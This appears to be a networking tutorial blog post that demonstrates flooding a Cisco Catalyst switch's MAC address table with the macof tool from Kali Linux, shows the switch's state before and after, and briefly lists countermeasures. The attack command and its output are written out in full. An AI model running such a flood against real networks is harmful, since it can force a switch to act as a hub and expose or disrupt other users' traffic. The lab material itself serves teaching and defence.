At this point, I prefer to present my networking students a practical tool which Floods CAM Table of a Cisco Catalyst switch. It is unrelated to the previous and next posts.
macof
The command macof is the tool with which we are going to flood a LAN switch (In our example a Cisco Catalyst switch) with random MAC addresses. Here is our topology:
Why is this important?
Switches have limited resources and in the case of Cisco Catalyst switches we can check how much of those resources are available for us. For example, this Catalyst switch can handle up to 8000 unicast MAC addresses:
Switch#show sdm prefer
The current template is "default" template.
The selected template optimizes the resources in
the switch to support this level of features for
0 routed interfaces and 255 VLANs.
number of unicast mac addresses: 8K
number of IPv4 IGMP groups + multicast routes: 0.25K
number of IPv4 unicast routes: 0.375k
number of directly-connected IPv4 hosts: 0.375k
number of indirect IPv4 routes: 0
number of IPv6 multicast groups: 0.25K
number of IPv6 unicast routes: 0.25K
number of directly-connected IPv6 addresses: 0.25K
number of indirect IPv6 unicast routes: 0
number of IPv4 policy based routing aces: 0
number of IPv4/MAC qos aces: 0.375k
number of IPv4/MAC security aces: 0.375k
number of IPv6 policy based routing aces: 0
number of IPv6 qos aces: 60
number of IPv6 security aces: 0.125k
Since we are limited in the number of MAC addresses, if a threat actor injects more MAC addresses than a switch can handle, the switch no longer is able to learn new MAC addresses then in functions as a hub.
Let’s see how many dynamic MAC addresses presently learnt by the Switch:
Switch#show mac address-table dynamic
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
1 0050.56a5.8f1e DYNAMIC Gi2/0/1
Total Mac Addresses for this criterion: 1
Now Let’s generate 500 MAC addresses using macof tool, then check the Switch CAM table.
If macof package is not installed on your Kali Linux you need to install the package using sudo apt install dsniff. (You can refer to the post here for more information about Debian package management)
┌──(kaliă‰¿kali-1)-[~]
└─$ sudo macof -i eth1 -n 500
c2:45:4b:15:25:65 81:30:a5:c:f4:79 0.0.0.0.28326 > 0.0.0.0.38890: S 367494066:367494066(0) win 512
9:68:aa:5:1e:98 b3:91:7d:62:82:42 0.0.0.0.18617 > 0.0.0.0.27713: S 1000482956:1000482956(0) win 512
b1:cd:ba:5e:b6:3d df:4f:0:22:f5:f1 0.0.0.0.25409 > 0.0.0.0.10998: S 2097405006:2097405006(0) win 512
ec:2b:3:49:5f:34 9a:df:e8:f:16:b2 0.0.0.0.3015 > 0.0.0.0.40185: S 1446148009:1446148009(0) win 512
Switch#show mac address-table count
Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 501
Static Address Count : 0
Total Mac Addresses : 501
Total Mac Address Space Available: 7670
How to Countermeasure the MAC Flood
There are 3 ways to countermeasure the MAC Flood.
- Port-Security: Please refer to here for more information
- 802.1x (AKA DOT1X): Please refer to here for more information
- MAC Address filtering: Please refer to here for more information
